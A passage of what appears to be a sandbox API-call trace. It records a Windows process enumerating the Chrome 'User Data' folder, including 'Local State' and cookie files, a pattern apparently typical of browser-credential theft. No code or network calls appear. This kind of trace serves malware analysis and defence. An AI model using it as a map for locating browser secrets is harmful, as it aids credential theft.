ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.515] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrome", cAlternateFileName="")) returned 1 [0184.515] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0184.515] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 0 [0184.516] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0184.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0184.516] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0184.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google", lpFilePart=0x0) returned 0x32 [0184.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\", lpFilePart=0x0) returned 0x33 [0184.516] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.516] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.517] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrome", cAlternateFileName="")) returned 1 [0184.517] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b0b7d20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6b0b7d20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x6b0b7d20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CrashReports", cAlternateFileName="CRASHR~1")) returned 1 [0184.517] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0184.517] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0184.517] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0184.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0184.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", lpFilePart=0x0) returned 0x39 [0184.517] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\", lpFilePart=0x0) returned 0x3a [0184.518] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.518] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.518] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 1 [0184.519] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 0 [0184.519] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0184.519] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0184.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0184.519] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome", lpFilePart=0x0) returned 0x39 [0184.519] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\", lpFilePart=0x0) returned 0x3a [0184.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.519] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f572ae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f572ae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.520] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Data", cAlternateFileName="USERDA~1")) returned 1 [0184.520] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0184.520] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0184.520] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0184.520] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0184.520] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x43 [0184.520] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x44 [0184.520] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f790 [0184.526] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.528] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CertificateTransparency", cAlternateFileName="CERTIF~1")) returned 1 [0184.528] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f5beda0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f5beda0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crashpad", cAlternateFileName="")) returned 1 [0184.528] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c4887c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c4887c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0184.528] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EVWhitelist", cAlternateFileName="EVWHIT~1")) returned 1 [0184.529] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileTypePolicies", cAlternateFileName="FILETY~1")) returned 1 [0184.529] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f8b8920, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f8b8920, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f8b8920, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="First Run", cAlternateFileName="FIRSTR~1")) returned 1 [0184.529] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85749110, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c0bcce0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0bf3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1082a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local State", cAlternateFileName="LOCALS~1")) returned 1 [0184.529] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OriginTrials", cAlternateFileName="ORIGIN~1")) returned 1 [0184.529] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PepperFlash", cAlternateFileName="PEPPER~1")) returned 1 [0184.530] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e47510, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e47510, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e47510, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pnacl", cAlternateFileName="")) returned 1 [0184.530] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85e6fa20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97f6e8b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Channel IDs", cAlternateFileName="SAFEBR~3")) returned 1 [0184.530] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85e6fa20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x97f94a10, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Channel IDs-journal", cAlternateFileName="SAFEBR~4")) returned 1 [0184.530] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8582d950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8582d950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Cookies", cAlternateFileName="SAFEBR~1")) returned 1 [0184.530] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8582d950, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8582d950, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Safe Browsing Cookies-journal", cAlternateFileName="SAFEBR~2")) returned 1 [0184.531] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SSLErrorAssistant", cAlternateFileName="SSLERR~1")) returned 1 [0184.531] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81e213b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81e213b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81e213b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SwReporter", cAlternateFileName="SWREPO~1")) returned 1 [0184.531] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 1 [0184.531] FindNextFileW (in: hFindFile=0xb7f790, lpFindFileData=0x949e964 | out: lpFindFileData=0x949e964*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81dfb250, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x81dfb250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WidevineCdm", cAlternateFileName="WIDEVI~1")) returned 0 [0184.532] FindClose (in: hFindFile=0xb7f790 | out: hFindFile=0xb7f790) returned 1 [0184.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebec) returned 1 [0184.533] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebf8) returned 1 [0184.533] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec2c) returned 1 [0184.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x949e734, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x43 [0184.533] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", nBufferLength=0x105, lpBuffer=0x949e708, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\", lpFilePart=0x0) returned 0x44 [0184.533] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x949e954 | out: lpFindFileData=0x949e954*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f572ae0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c593160, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c593160, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, 